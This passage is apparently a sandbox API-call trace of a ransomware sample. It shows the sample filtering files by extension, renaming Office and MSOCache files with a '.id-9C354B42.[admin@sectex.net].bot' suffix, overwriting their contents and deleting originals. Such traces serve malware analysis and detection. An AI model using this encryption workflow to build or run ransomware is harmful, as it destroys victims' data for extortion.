	[0058.671] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.671] lstrlenW (lpString=".xlsx") returned 5
	[0058.671] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0058.671] lstrlenW (lpString=".ppt") returned 4
	[0058.671] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.671] lstrlenW (lpString=".zip") returned 4
	[0058.671] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.671] lstrlenW (lpString=".rar") returned 4
	[0058.671] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.671] lstrlenW (lpString=".bz2") returned 4
	[0058.671] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.671] lstrlenW (lpString=".7z") returned 3
	[0058.671] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.671] lstrlenW (lpString=".dbf") returned 4
	[0058.671] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.671] lstrlenW (lpString=".1cd") returned 4
	[0058.671] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.671] lstrlenW (lpString=".jpg") returned 4
	[0058.671] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.671] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.671] lstrlenW (lpString="ACEWDAT.DLL") returned 11
	[0058.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.672] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=3050912) returned 1
	[0058.672] CloseHandle (hObject=0x214) returned 1
	[0058.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll")) returned 0x20
	[0058.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0058.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.726] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0058.726] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.726] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.769] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.769] ReadFile (in: hFile=0x214, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.776] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0058.776] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.776] ReadFile (in: hFile=0x214, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.802] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.803] WriteFile (in: hFile=0x214, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0058.959] SetEndOfFile (hFile=0x214) returned 1
	[0059.105] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb442660
	[0059.109] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0059.109] WriteFile (in: hFile=0x214, lpBuffer=0xb442660*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442660*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0059.111] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0059.111] WriteFile (in: hFile=0x214, lpBuffer=0xb442660*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442660*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0059.116] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0059.116] WriteFile (in: hFile=0x214, lpBuffer=0xb442660*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442660*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0059.118] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb442660 | out: hHeap=0x7d60000) returned 1
	[0059.118] CloseHandle (hObject=0x214) returned 1
	[0059.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.118] lstrlenW (lpString=".doc") returned 4
	[0059.118] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.118] lstrlenW (lpString=".docx") returned 5
	[0059.118] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0059.118] lstrlenW (lpString=".pdf") returned 4
	[0059.118] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.118] lstrlenW (lpString=".xls") returned 4
	[0059.118] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".xlsx") returned 5
	[0059.119] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0059.119] lstrlenW (lpString=".ppt") returned 4
	[0059.119] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString=".zip") returned 4
	[0059.119] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".rar") returned 4
	[0059.119] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".bz2") returned 4
	[0059.119] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.119] lstrlenW (lpString=".7z") returned 3
	[0059.119] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString=".dbf") returned 4
	[0059.119] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString=".1cd") returned 4
	[0059.119] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString=".jpg") returned 4
	[0059.119] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.119] lstrlenW (lpString=".doc") returned 4
	[0059.119] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".docx") returned 5
	[0059.119] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0059.119] lstrlenW (lpString=".pdf") returned 4
	[0059.119] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".xls") returned 4
	[0059.119] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.119] lstrlenW (lpString=".xlsx") returned 5
	[0059.120] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0059.120] lstrlenW (lpString=".ppt") returned 4
	[0059.120] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.120] lstrlenW (lpString=".zip") returned 4
	[0059.120] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.120] lstrlenW (lpString=".rar") returned 4
	[0059.120] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.120] lstrlenW (lpString=".bz2") returned 4
	[0059.120] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.120] lstrlenW (lpString=".7z") returned 3
	[0059.120] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.120] lstrlenW (lpString=".dbf") returned 4
	[0059.120] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.120] lstrlenW (lpString=".1cd") returned 4
	[0059.120] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67
	[0059.120] lstrlenW (lpString=".jpg") returned 4
	[0059.120] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.120] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0059.120] lstrlenW (lpString="ATLCONV.DLL") returned 11
	[0059.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 16
	os_tid = 0x994

	[0032.821] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xac108b8
	[0032.821] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xac208c0
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f88
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb02d0
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fa0
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xb1c0020
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fb8
	[0032.822] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08fb8, Size=0x20) returned 0x7df2f68
	[0032.822] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fb8
	[0032.822] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08fb8, Size=0x20) returned 0x7df2f90
	[0032.822] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.823] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.823] Wow64DisableWow64FsRedirection (in: OldValue=0xa69ff58 | out: OldValue=0xa69ff58*=0x0) returned 1
	[0032.823] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.823] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.823] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.823] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.823] Sleep (dwMilliseconds=0x64) 
	[0033.039] Sleep (dwMilliseconds=0x64) 
	[0033.604] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.605] lstrlenW (lpString="Proof.xml") returned 9
	[0033.605] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0033.885] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1457) returned 1
	[0033.885] CloseHandle (hObject=0x1a8) returned 1
	[0033.885] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020
	[0033.885] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.885] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0033.885] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.885] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.885] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0033.886] GetLastError () returned 0x0
	[0033.886] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x5b1, lpOverlapped=0x0) returned 1
	[0033.899] WriteFile (in: hFile=0x1ac, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0033.900] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.900] WriteFile (in: hFile=0x1ac, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.900] SetEndOfFile (hFile=0x1ac) returned 1
	[0033.900] CloseHandle (hObject=0x1ac) returned 1
	[0033.901] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.901] SetEndOfFile (hFile=0x1a8) returned 1
	[0033.902] CloseHandle (hObject=0x1a8) returned 1
	[0033.902] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.902] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString=".doc") returned 4
	[0033.903] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString=".docx") returned 5
	[0033.903] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.903] lstrlenW (lpString=".pdf") returned 4
	[0033.903] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString=".xls") returned 4
	[0033.903] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString=".xlsx") returned 5
	[0033.903] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.903] lstrlenW (lpString=".ppt") returned 4
	[0033.903] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString=".zip") returned 4
	[0033.903] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.903] lstrlenW (lpString=".rar") returned 4
	[0033.903] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString=".bz2") returned 4
	[0033.903] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString=".7z") returned 3
	[0033.903] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString=".dbf") returned 4
	[0033.903] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString=".1cd") returned 4
	[0033.903] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.903] lstrlenW (lpString=".jpg") returned 4
	[0033.903] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString=".doc") returned 4
	[0033.904] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString=".docx") returned 5
	[0033.904] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.904] lstrlenW (lpString=".pdf") returned 4
	[0033.904] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString=".xls") returned 4
	[0033.904] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString=".xlsx") returned 5
	[0033.904] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.904] lstrlenW (lpString=".ppt") returned 4
	[0033.904] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString=".zip") returned 4
	[0033.904] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.904] lstrlenW (lpString=".rar") returned 4
	[0033.904] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString=".bz2") returned 4
	[0033.904] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString=".7z") returned 3
	[0033.904] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.904] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString=".dbf") returned 4
	[0033.904] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString=".1cd") returned 4
	[0033.904] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.904] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81
	[0033.904] lstrlenW (lpString=".jpg") returned 4
	[0033.904] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.904] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.904] lstrlenW (lpString="VisioMUI.xml") returned 12
	[0033.905] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.031] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=9503) returned 1
	[0034.031] CloseHandle (hObject=0x1a8) returned 1
	[0034.031] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020
	[0034.031] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.031] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.031] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.032] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.032] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0034.350] GetLastError () returned 0x0
